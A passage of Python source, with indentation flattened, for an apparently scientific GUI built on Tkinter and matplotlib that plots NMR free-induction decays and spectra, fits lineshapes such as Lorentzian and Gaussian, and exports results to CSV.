self.fig_left1.subplots_adjust(bottom=0.20, left= 0.12, right=0.96, top=0.88)
self.fig_left1.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_left2.subplots_adjust(bottom=0.15, left= 0.12, right=0.96, top=0.9)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#interrupt button
self.button_interrupt = ttk.Button(self.frame_left3, text='Interrupt', command=self.Interrupt)
self.button_interrupt.pack(side='left', anchor='w')
#confirm shl selection, jump to phase
self.button_confirm_shl = ttk.Button(self.frame_left3, text='Confirm', command=self.Confirm)
self.button_confirm_shl.pack(side='right', anchor='e')
#check button for mirroring fid
self.check_mirroring_var = tk.BooleanVar(self, False)
if self.mirroring:
self.check_mirroring_var.set(True)
self.check_mirroring = (ttk.Checkbutton(self.frame_left3, variable=self.check_mirroring_var))
self.check_mirroring.pack(side='right')
self.label_mirroring = tk.Label(self.frame_left3, text='Mirroring')
self.label_mirroring.pack(side='right')
#label and edit of mean_range
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
self.label_offset = tk.Label(self.frame_left3_middle, text='Chosen offset range:')
self.label_offset.pack(side='left')
self.entry_offset_var = tk.StringVar(self, value=self.offset_select)
self.entry_offset = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_offset_var, width=4)
self.entry_offset.pack(side='left')
self.entry_offset.bind('<Return>', Set_offset)
self.button_set_offset = ttk.Button(self.frame_left3_middle, text='Set offset', command=Set_offset)
self.button_set_offset.pack(side='left')
#plot 3
self.fig_right1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_right1.subplots_adjust(bottom=0.20, left= 0.12, right=0.96, top=0.88)
self.canvas_right1 = FigureCanvasTkAgg(self.fig_right1, self.frame_right1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right1, self.frame_right1)
self.canvas_right1._tkcanvas.pack()
#label and edit of shl select
self.frame_right2_middle = tk.Frame(self.frame_right2)
self.frame_right2_middle.pack(anchor='center')
self.label_shl = tk.Label(self.frame_right2_middle, text='Chosen shl:')
self.label_shl.pack(side='left')
self.entry_shl_var = tk.StringVar(self, value=self.shl)
self.entry_shl = ttk.Entry(self.frame_right2_middle,
textvariable=self.entry_shl_var, width=4)
self.entry_shl.pack(side='left')
self.entry_shl.bind('<Return>', Set_shl)
self.button_set_shl = ttk.Button(self.frame_right2_middle, text='Set SHL', command=Set_shl)
self.button_set_shl.pack(side='left')
#plot 4
self.fig_right2 = plt.figure(dpi=100, figsize=(7,4))
self.fig_right2.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.9)
self.canvas_right2 = FigureCanvasTkAgg(self.fig_right2, self.frame_right3)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_right2, self.frame_right2)
self.canvas_right2._tkcanvas.pack()
#entries for phase fit (lin)
self.label_k = tk.Label(self.frame_right4, text='k:')
self.label_k.pack(side='left')
self.entry_k_var = tk.StringVar(self, value=None)
self.entry_k = ttk.Entry(self.frame_right4, textvariable=self.entry_k_var, width=6, state='disabled')
self.entry_k.pack(side='left')
self.label_n = tk.Label(self.frame_right4, text='n:')
self.label_n.pack(side='left')
self.entry_n_var = tk.StringVar(self, value=None)
self.entry_n = ttk.Entry(self.frame_right4, textvariable=self.entry_n_var, width=6, state='disabled')
self.entry_n.pack(side='left')
self.button_fit = ttk.Button(self.frame_right4, text='Refit', command=self.Refit, state='disabled')
self.button_fit.pack(side='left')
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_right4, text='Confirm', command=self.Finish, state='disabled')
self.button_confirm.pack(side='right')
#fitting range variables for phase fit
self.fit_range_l_var = tk.IntVar(self, value=0)
self.fit_range_r_var = tk.IntVar(self, value=-1)
try:
self.fit_range_l_var.set(self.trace.fit_range[0])
self.fit_range_r_var.set(self.trace.fit_range[1])
except:
pass
def Fill_plots(self, temp_list, temp_list2, temp_set, fr_list, shl_list):
'''Puts the contents into the plot fields'''
#starting values
self.mean_shl = np.mean(shl_list)
#x axes
n = len(fr_list)
x_list = np.linspace(1,n,n)
#fids
fids = list()
for file in self.trace.file_list:
fid = FID(file, self.trace.file_dir)
fids.append(fid.x)
#plot 1, temperature stabillity
self.axes_left1 = self.fig_left1.add_subplot(111)
try:
if abs(np.mean(temp_list) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list, marker='.', color=colors[1], label='ITC_R1')
if abs(np.mean(temp_list2) - temp_set) < 2:
self.axes_left1.plot(x_list, temp_list2, marker='.', color=colors[2], label='ITC_R2')
except: pass
self.axes_left1.axhline(y=temp_set, color=colors[0], label='Set T')
self.axes_left1.margins(0.02, 0.1)
self.axes_left1.set_title('Temperature stabillity check')
self.axes_left1.set_xlabel('File index')
self.axes_left1.set_ylabel('Temperature (K)')
self.axes_left1.legend(loc='upper right')
self.axes_left1.grid()
#plot 2
self.axes_left2 = self.fig_left2.add_subplot(111)
for i, fid in enumerate(fids):
self.axes_left2.plot(np.abs(fid)+np.amax(np.abs(fids))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_left2_vline = self.axes_left2.axvline(x=self.shl,
color=colors[0], label='Select')
self.axes_left2_vline_offset = self.axes_left2.axvline(x=self.offset_select,
color=colors[2], label='Offset Select')
self.axes_left2.set_title('offset range select')
self.axes_left2.set_xlabel('Time, (A.U.)')
self.axes_left2.set_ylabel('Signal')
#legend = self.axes_left2.legend(loc='lower right')
#legend.draggable()
self.axes_left2.grid()
#plot 3
self.axes_right1 = self.fig_right1.add_subplot(111)
self.axes_right1.plot(x_list, shl_list, marker='.',
color=colors[1], label='SHL')
self.axes_right1_hline = self.axes_right1.axhline(self.shl,
color=colors[0], label='Mean SHL')
self.axes_right1.margins(0.02, 0.1)
self.axes_right1.set_title('SHL select')
self.axes_right1.set_xlabel('File index')
self.axes_right1.set_ylabel('Shift left')
#self.axes_right1.legend(loc='lower right')
self.axes_right1.grid()
#redraw canvases
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, redraws the line on right'''
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.offset_select = int(event.xdata)
self.entry_offset_var.set(self.offset_select)
#update plot
self.axes_left2_vline_offset.set_xdata(event.xdata)
self.fig_left2.canvas.draw()
#draggable vline event
def Drag_shl(event):
'''Allows dragging of the marker in left2, redraws the line on right'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.shl = int(event.xdata)
self.entry_shl_var.set(self.shl)
#update plot
self.axes_left2_vline.set_xdata(self.shl)
self.axes_right1_hline.set_ydata(self.shl)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
#draggable hline event
def Drag_shl2(event):
''''Allows dragging of the marker in right1, redraws shl lines'''
if event.button == 1 and event.inaxes !=None:
#find selected index
self.shl = int(event.ydata)
self.entry_shl_var.set(self.shl)
#update plots
self.axes_left2_vline.set_xdata(self.shl)
self.axes_right1_hline.set_ydata(event.ydata)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag_shl)
self.axes_right1_hline_drag = self.fig_right1.canvas.mpl_connect('motion_notify_event', Drag_shl2)
class Frame_plot_spc_ranges(tk.Frame):
'''Pioneer first T2 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='both', expand=True)
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
self.range_l_select = self.parent.temperatures.previous_spc['integral_range'][0]
self.range_r_select = self.parent.temperatures.previous_spc['integral_range'][1]
#load widgets
self.Widgets()
#load plots and read
self.Choose_ranges(trace)
self.focus()
#global key bindings
root.bind('<Left>', self.Previous)
root.bind('<Right>', self.Finish)
def Widgets(self):
'''Builds all the subframes and canvases'''
def Set_offset(event=None):
'''Entry change of offset, replot and write value'''
try:
self.offset_select = int(self.entry_offset.get())
#update plot
self.axes_left1_vline.set_xdata(self.offset_select)
self.axes_left2_vline.set_xdata(self.offset_select)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
def Set_range(event=None):
'''Entry change of ranges, replot and save value'''
try:
self.range_l_select = int(self.entry_range_l_var.get())
self.range_r_select = int(self.entry_range_r_var.get())
self.axes_left1_vline_l.set_xdata(self.spc_fr[self.range_l_select])
self.axes_left2_vline_l.set_xdata(self.spc_fr[self.range_l_select])
self.axes_left1_vline_r.set_xdata(self.spc_fr[self.range_r_select])
self.axes_left2_vline_r.set_xdata(self.spc_fr[self.range_r_select])
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted values must be integers!')
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right3 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top')
self.frame_right3.pack(side='top', fill='x')
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_left1.subplots_adjust(bottom=0.20, left= 0.10, right=0.96, top=0.88)
self.canvas_left1 = FigureCanvasTkAgg(self.fig_left1, self.frame_left1)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left1, self.frame_left1)
self.canvas_left1._tkcanvas.pack()
#plot 2
self.fig_left2 = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_left2.subplots_adjust(bottom=0.12, left= 0.10, right=0.96, top=0.93)
self.canvas_left2 = FigureCanvasTkAgg(self.fig_left2, self.frame_left2)
#self.toolbar = NavigationToolbar2TkAgg(self.canvas_left2, self.frame_left2)
self.canvas_left2._tkcanvas.pack()
#buttons left
self.button_previous = ttk.Button(self.frame_left3, text='Repeat previous', command=self.Previous)
self.button_previous.pack(side='left')
self.button_confirm = ttk.Button(self.frame_left3, text='Confirm', command=self.Finish)
self.button_confirm.pack(side='right')
#middle frame
self.frame_left3_middle = tk.Frame(self.frame_left3)
self.frame_left3_middle.pack(anchor='center')
self.label_range = tk.Label(self.frame_left3_middle, text='Selected ranges:')
self.label_range.pack(side='left')
self.entry_range_l_var = tk.StringVar(self, value=self.range_l_select)
self.entry_range_l = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_range_l_var, width=5)
self.entry_range_l.pack(side='left')
self.entry_range_l.bind('<Return>', Set_range)
self.label_range_comma = tk.Label(self.frame_left3_middle, text=' , ')
self.label_range_comma.pack(side='left')
self.entry_range_r_var = tk.StringVar(self, value=self.range_r_select)
self.entry_range_r = ttk.Entry(self.frame_left3_middle,
textvariable=self.entry_range_r_var, width=5)
self.entry_range_r.pack(side='left')
self.entry_range_r.bind('<Return>', Set_range)
self.button_set_range = ttk.Button(self.frame_left3_middle, text='Set range', command=Set_range)
self.button_set_range.pack(side='left')
#button commands
def Previous(self, event=None):
'''Back to the previous step!'''
#reload offset
self.parent.plot_spc_quick.pack(side='left', fill='both', expand=True)
#destroy me
self.pack_forget()
self.destroy()
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
def Finish(self, event=None):
'''Confirm the selection in this screen'''
#save the integral ranges
self.trace.integral_range = (self.range_l_select, self.range_r_select)
self.parent.temperatures.previous_spc['integral_range'] = (self.range_l_select,
self.range_r_select)
#finish the analysis
self.trace.Run(broaden_width=50000)
#unpack and destroy
self.trace.analysed = True
self.parent.plot_spc_quick.destroy()
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#load the overview frame
self.parent.plot_spc_view = Frame_plot_spc_view(self.parent, self.trace)
def Choose_ranges(self, trace):
'''Operations and plotting for choosing spectrum integral ranges'''
k = self.trace.phase_fit_p
spcs = list()
fr_list = list()
for i, file in enumerate(trace.file_list):
fid = FID(file, trace.file_dir)
fid.Offset(trace.offset_range)
fid.Shift_left(trace.mean_shl, mirroring=trace.mirroring)
fid.Fourier()
fid.Phase_rotate(trace.phase_fit[i])
spcs.append(fid.spc)
fr_list.append(fid.parameters['FR'])
max_spc = np.unravel_index(np.argmax(spcs), (len(spcs),len(spcs[0])))[0]
spc_fr = fid.spc_fr
spc_mean = spcs[max_spc]
center = int(len(spc_mean)/2)
#plot 3
self.axes_left1 = self.fig_left1.add_subplot(111)
self.axes_left1.plot(np.real(spc_mean), color=colors[1], label='Re')
self.axes_left1.plot(np.imag(spc_mean), color=colors[2], label='Im')
self.axes_left1.axvline(x=center, color=colors[-1])
self.axes_left1_vline_l = self.axes_left1.axvline(x=self.range_l_select,
color=colors[4])
self.axes_left1_vline_r = self.axes_left1.axvline(x=self.range_r_select,
color=colors[4])
self.axes_left1.set_xlim((center -200, center +200))
self.axes_left1.set_title('Mean spectrum (Drag with left and right mouse button)')
self.axes_left1.set_xlabel('Frequency (MHz)')
self.axes_left1.set_ylabel('Signal (A.U.)')
self.axes_left1.legend(loc='upper left')
self.axes_left1.grid()
#plot 4
self.axes_left2 = self.fig_left2.add_subplot(111)
for i, spc in enumerate(spcs):
self.axes_left2.plot(np.real(spc)+np.amax(np.abs(spc_mean))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_left1.axvline(x=center, color=colors[-1])
self.axes_left2_vline_l = self.axes_left2.axvline(x=self.range_l_select,
color=colors[4])
self.axes_left2_vline_r = self.axes_left2.axvline(x=self.range_r_select,
color=colors[4])
self.axes_left2.set_xlim((center -200,+ center +200))
self.axes_left2.margins(0.02, 0.02)
self.axes_left2.set_title('All FIDs')
self.axes_left2.set_xlabel('Frequency (MHz)')
self.axes_left2.set_ylabel('Real part of signal (A.U.)')
self.axes_left2.grid()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.entry_range_l_var.set(int(event.xdata))
self.range_l_select = int(event.xdata)
#update plot
self.axes_left1_vline_l.set_xdata(event.xdata)
self.axes_left2_vline_l.set_xdata(event.xdata)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.entry_range_r_var.set(int(event.xdata))
self.range_r_select = int(event.xdata)
#update plot
self.axes_left1_vline_r.set_xdata(event.xdata)
self.axes_left2_vline_r.set_xdata(event.xdata)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.axes_left1_vline_drag = self.fig_left1.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
class Frame_plot_spc_view(tk.Frame):
'''Pioneer first T2 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#load widgets
self.Widgets()
#global key bind
root.bind('<Right>', self.Confirm)
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Disable(event=None):
'''Disables and red-flags the point to avoid plotting'''
#try:
self.trace.disabled = not self.trace.disabled
#except:
# self.trace.disabled = True
self.Refresh_parameters()
def Repeat(event=None):
'''Clears the T2 trace and starts the analysis from scratch'''
self.trace.Reinit()
self.Confirm()
self.trace.analysed = False
#bottom button row
self.frame_bottom = tk.Frame(self)
self.frame_bottom.pack(side='bottom', fill='x')
#split in columns
self.frame_parameters = tk.Frame(self, bd=5)
self.frame_parameters.pack(side='left', anchor='n')
self.frame_plot = tk.Frame(self, bd=5)
self.frame_plot.pack(side='left', anchor='n')
self.frame_fit = tk.Frame(self, bd=5)
self.frame_fit.pack(side='left', anchor='n', fill='y')
#parameters
self.label_parameters = tk.Label(self.frame_parameters, text='Parameters')
self.label_parameters.pack(side='top')
self.tree_columns = ('Name','Value')
self.tree_parameters = ttk.Treeview(self.frame_parameters, columns=self.tree_columns,
show='headings', selectmode='none', height=25)
self.tree_parameters.pack(side='top',fill='y', expand=True)
#define column widths
self.tree_parameters.column('Name', width=80)
self.tree_parameters.column('Value', width=120)
#define column names
for column in self.tree_columns:
self.tree_parameters.heading(column, text=column)
#display in degrees
#fill in params
self.Refresh_parameters()
# disable point button
self.button_disable = ttk.Button(self.frame_parameters, text='Disable/enable Point',
command=Disable, width=20)
self.button_disable.pack(side='top')
#redo analysis button
self.button_repeat = ttk.Button(self.frame_parameters, text='Repeat analysis',
command=Repeat, width=20)
self.button_repeat.pack(side='top')
#point plot
self.fig_spc = plt.figure(dpi=100, figsize=(8,3))
self.fig_spc.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.92)
self.fig_spc.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_spc = FigureCanvasTkAgg(self.fig_spc, self.frame_plot)
self.canvas_spc._tkcanvas.pack()
#glue plot
self.fig_glue = plt.figure(dpi=100, figsize=(8,4))
self.fig_glue.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.92)
self.canvas_glue = FigureCanvasTkAgg(self.fig_glue, self.frame_plot)
self.canvas_glue._tkcanvas.pack()
#fitting range variables
self.fit_range_l_var = tk.IntVar(self, value=0)
self.fit_range_r_var = tk.IntVar(self, value=len(self.trace.fr_list))
try:
self.fit_range_l_var.set(self.trace.fit_range[0])
self.fit_range_r_var.set(self.trace.fit_range[1])
except:
pass
self.Fill_plot()
self.Fitting_frame()
## #add button to confirm selection
## self.button_confirm = ttk.Button(self.frame_bottom, text='Confirm', command=self.Confirm)
## self.button_confirm.pack(side='right')
## self.button_confirm.bind('<Return>', self.Confirm)
##
## #add button to export spectra
## self.button_confirm = ttk.Button(self.frame_bottom, text='Export CSV', command=self.Export)
## self.button_confirm.pack(side='right')
def Fitting_frame(self, event=None):
'''Repacks/initializes the fitting frame for the selected fitting function'''
#repack if existing:
try:
self.frame_fit.destroy()
except:
pass
#fit frame
self.frame_fit = tk.Frame(self, bd=5)
self.frame_fit.pack(side='left', anchor='n', fill='y')
#fit functions
def Fit_lorentz(x, x0=0, a=500, g=1000):
'''Lorentzian lineshape model'''
return a*g/np.pi/(g**2 + (x-x0)**2)
def Asym(x, x0, c):
'''The smoothened function used to assymetrise'''
b = 10
return np.abs(c)/(1+np.exp((x-x0)*np.sign(c)*b))+1
def Fit_lorentz_asymmetric(x, x0=0, a=500, g=1000, c=0.2):
'''Lorentzian lineshape model with asymmetry'''
ga = g*Asym(x, x0, c)
aa = a*Asym(x, x0, c)
return aa*ga/np.pi/(ga**2 + (x-x0)**2)
## def Fit_lorentz_asymmetric(x, x0=0, a=500, g=1000, b=1, c=0):
## '''Lorentzian with fermi changing linewidth for asymmetry'''
## g2 = g*(1/(1+np.exp((x-x0)/b)) + c)
## return a*g2/np.pi/(g2**2 + (x-x0)**2)
def Fit_polynom(x, x0=0, a=1, b=0, c=0, d=0):
'''T1 fit model for spin 3/2'''
return a*(x-x0)**3 + b*(x-x0)**2 + c*(x-x0) + d
def Fit_gaussian(x, x0=0, a=1, s=1000):
'''Gaussian lineshape model'''
return a/(s*np.sqrt(2*np.pi))*np.exp(-0.5*((x-x0)/s)**2)
#reference to functions
# [function, fit_params, start guess, label, tex_form]
self.fit_names = {'Lorentz':[Fit_lorentz, ['x0', 'a', 'g'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
self.trace.spc_list_points[int(len(self.trace.fr_list)/2)],
self.trace.fr_list[-1]-self.trace.fr_list[0]/2
],
'a*g/pi/(g^2+(x-x0)^2)'
],
'Asymmetric':[Fit_lorentz_asymmetric, ['x0', 'a', 'g', 'c'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
self.trace.spc_list_points[int(len(self.trace.fr_list)/2)],
self.trace.fr_list[-1]-self.trace.fr_list[0]/2,
0
],
'a*g(x)/pi/(g(x)^2+(x-x0)^2)'
],
'Polynom':[Fit_polynom, ['x0','a','b','c','d'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
1,
3*self.trace.fr_list[int(len(self.trace.fr_list)/2)],
0,
0],
'a*x^3+b*x^2+c*x+d'
],
'Gauss':[Fit_gaussian, ['x0', 'a', 's'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
self.trace.spc_list_points[int(len(self.trace.fr_list)/2)],
self.trace.fr_list[-1]-self.trace.fr_list[0]/2
],
'a*/sqrt(2*pi)*exp(-0.5*((x-x0)/s)**2)^2'
]
}
def Fit():
'''Executes the fit with given parameters and plots it'''
Fit_function = self.fit_names[self.combo_fit_var.get()][0]
#read values from entry boxes
start_params = dict()
for entry,param in zip(self.entry_params_start, param_list):
start_params[param]=float(entry.get())
#data points
fit_range=(int(self.fit_range_l_var.get()), int(self.fit_range_r_var.get()))
#print(fit_range)
x = self.trace.fr_list
x2 = self.trace.fr_list[slice(*fit_range)]
y = self.trace.spc_list_points[slice(*fit_range)]
#print(x,y)
y_start = [Fit_function(xx, **start_params) for xx in x]
#check if last parameter is enabled or not
p_start = [start_params[key] for key in param_list]
## if not self.check_params_start_var.get():
## p_start.pop(-1)
## self.entry_params_fit[-1].config(state='normal')
## self.entry_params_fit[-1].delete(0, 'end')
## self.entry_params_fit[-1].insert('end', 1)
## self.entry_params_fit[-1].config(state='readonly')
#run fit, p_optimal, p_covariance matrix
try:
popt,pcov = curve_fit(Fit_function, x2, y, p0=p_start)
y_fit = [Fit_function(xx, *popt) for xx in x]
except:
return
#print values to entry boxes
for i,p in enumerate(popt):
self.entry_params_fit[i].config(state='normal')
self.entry_params_fit[i].delete(0, 'end')
self.entry_params_fit[i].insert('end','%.4g' %p)
self.entry_params_fit[i].config(state='readonly')
#update plots
self.axes_start_plot.set_ydata(y_start)
self.axes_fit_plot.set_ydata(y_fit)
self.fig_spc.canvas.draw()
#save parameters
self.trace.fit_params = popt
self.trace.fit_param_cov = pcov
self.trace.fr = popt[0]
self.trace.width = popt[2]
self.trace.fit_range = fit_range
## if self.check_params_start_var.get():
## self.trace.r = popt[-1]
## else:
## self.trace.r = 1
self.Refresh_parameters()
def Change_fit(event=None):
'''Changes the current fitting function'''
#update memory in parent
self.parent.temperatures.previous_t1['fit']=self.combo_fit_var.get()
#repack the entries
self.Fitting_frame()
#rerun
#Fit()
#implement more options later if necessary
self.label_fit = tk.Label(self.frame_fit, text='Fitting function')
self.label_fit.pack(side='top')
self.combo_fit_var = tk.StringVar()
try:
self.combo_fit_var.set(self.parent.temperatures.previous_spc['fit'])
except KeyError:
self.combo_fit_var.set('Lorentz')
self.parent.temperatures.previous_spc['fit']='Lorentz'
self.combo_fit = ttk.Combobox(self.frame_fit, state='readonly', values=sorted(list(self.fit_names.keys())),
textvar=self.combo_fit_var)
self.combo_fit.pack(side='top')
self.combo_fit.bind("<<ComboboxSelected>>", Change_fit)
self.label_fit_fun = tk.Label(self.frame_fit, text=self.fit_names[self.combo_fit_var.get()][3], bd=5)
self.label_fit_fun.pack(side='top')
self.label_starting_params = tk.Label(self.frame_fit, text='Starting values', bd=5)
self.label_starting_params.pack(side='top')
param_list = self.fit_names[self.combo_fit_var.get()][1]
#guesses for where params should start
start_guess = self.fit_names[self.combo_fit_var.get()][2]
## start_guess = [self.trace.tau_list[self.trace.mean_range[0]-5],
## np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
## -self.trace.area_list[0]/self.trace.area_list[-1],
## 1]
## if self.combo_fit_var.get() == 'Spin 3/2':
## start_guess[0] = start_guess[0]*6
#start parameters entry rows
self.frame_params_start = list()
self.label_params_start = list()
self.entry_params_start = list()
for i,param in enumerate(param_list):
self.frame_params_start.append(tk.Frame(self.frame_fit))
self.frame_params_start[i].pack(side='top', fill='y')
self.label_params_start.append(tk.Label(self.frame_params_start[i], text=param+' = '))
self.label_params_start[i].pack(side='left', anchor='e')
self.entry_params_start.append(tk.Entry(self.frame_params_start[i],
width=10, justify='right'))
self.entry_params_start[i].insert(0, '%.4g' % start_guess[i])
self.entry_params_start[i].pack(side='left', anchor='e')
#check button for stretch
## self.check_params_start_var = tk.BooleanVar(self, 0)
## try:
## if self.trace.r != 1:
## self.check_params_start_var.set(1)
## except AttributeError: pass
## self.check_params_start = (ttk.Checkbutton(self.frame_params_start[-1],
## variable=self.check_params_start_var))
## self.check_params_start.pack(side='left')
self.button_fit = ttk.Button(self.frame_fit, text='Retry fit', command=Fit)
self.button_fit.pack(side='top')
self.label_fit_params = tk.Label(self.frame_fit, text='Fitted values', bd=5)
self.label_fit_params.pack(side='top')
#fit results entry rows
self.frame_params_fit = list()
self.label_params_fit = list()
self.entry_params_fit = list()
for i,param in enumerate(param_list):
self.frame_params_fit.append(tk.Frame(self.frame_fit))
self.frame_params_fit[i].pack(side='top', fill='y')
self.label_params_fit.append(tk.Label(self.frame_params_fit[i], text=param+' = '))
self.label_params_fit[i].pack(side='left')
self.entry_params_fit.append(tk.Entry(self.frame_params_fit[i], width=10,
state='readonly', justify='right'))
self.entry_params_fit[i].pack(side='left')
#run first lap of fit
Fit()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_fit, text='Confirm', command=self.Confirm)
self.button_confirm.pack(side='bottom')
self.button_confirm.bind('<Return>', self.Confirm)
#add export csv button
self.button_export = ttk.Button(self.frame_fit, text='Export CSV', command=self.Export)
self.button_export.pack(side='bottom')
self.button_export.bind('<F5>', self.Export)
#add export glue button
self.button_export_glue = ttk.Button(self.frame_fit, text='Export Glue', command=self.Export_glue)
self.button_export_glue.pack(side='bottom')
self.button_export_glue.bind('<F6>', self.Export_glue)
def Confirm(self, event=None):
'''Confirm the selection in this screen'''
#unpack, dont destroy untill series is done, in case corrections are needed
self.parent.temperatures.wait.set(False)
self.pack_forget()
self.destroy()
plt.close('all')
#move to later stages
self.trace.analysed = True
def Refresh_parameters(self):
'''refreshes the parameters table'''
self.tree_parameters.delete(*self.tree_parameters.get_children())
self.trace.Get_params()
for item in GLOBAL_spc_displayed_params:
try:
pair = (item, self.trace.__dict__[item])
self.tree_parameters.insert('', 'end', values=pair)
except: pass
def Export(self):
'''Saves the plotted data into a CSV file for further analysis'''
file_name = self.trace.__dict__['file_key'] + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'spc')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['fr(MHz)', 'area(A.U.)'])
#data
for i in range(len(self.trace.fr_list)):
row = [self.trace.fr_list[i], self.trace.spc_list_points[i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Export_glue(self):
'''Saves the glue points into a CSV file'''
file_name = self.trace.__dict__['file_key'] + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'glue_spc')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#define data lines
x = self.trace.spc_fr
y = self.trace.spc_sig_real
y2 = self.trace.spc_sig_imag
y3 = np.sqrt(y**2 + y2**2)
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['fr(MHz)', 'Re(A.U.)','Im(A.U.)','Abs(A.U.)'])
#data
for i in range(len(x)):
row = [x[i], y[i], y2[i], y3[i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Fill_plot(self):
'''Plots the T1 trend and fits it'''
#data lines
x = self.trace.fr_list
y = self.trace.spc_list_points
## sorting = np.argsort(x)
## x = np.array(x)[sorting]
## y = np.array(y)[sorting]
#point plot
self.axes = self.fig_spc.add_subplot(111)
self.axes.plot(x, y, marker='o', linestyle='-', color=colors[1], label='Data')
self.axes_start_plot, = self.axes.plot(x, y, color=colors[3],
linestyle='dashed', label='Fit start')
self.axes_fit_plot, = self.axes.plot(x, y, color=colors[4], label='Fit')
self.axes_vline_l = self.axes.axvline(x=self.trace.fr_list[self.fit_range_l_var.get()], color=colors[4])
self.axes_vline_r = self.axes.axvline(x=self.trace.fr_list[self.fit_range_r_var.get()-1], color=colors[4])
self.axes.set_title('Delta spectrum')
self.axes.set_xlabel(r'$\nu$ (MHz)')
self.axes.set_ylabel('Area (A.U.)')
legend = self.axes.legend(loc='lower right')
self.axes.grid()
x = self.trace.spc_fr
y = self.trace.spc_sig_real
y2 = self.trace.spc_sig_imag
y3 = np.sqrt(y**2 + y2**2)
#glue plot
self.axes_glue = self.fig_glue.add_subplot(111)
self.axes_glue.plot(x, y, color=colors[1], label='Re')
self.axes_glue.plot(x, y2, color=colors[2], label='Im')
self.axes_glue.plot(x, y3, color=colors[3], label='Abs')
self.axes_glue.set_title('Glued spectrum')
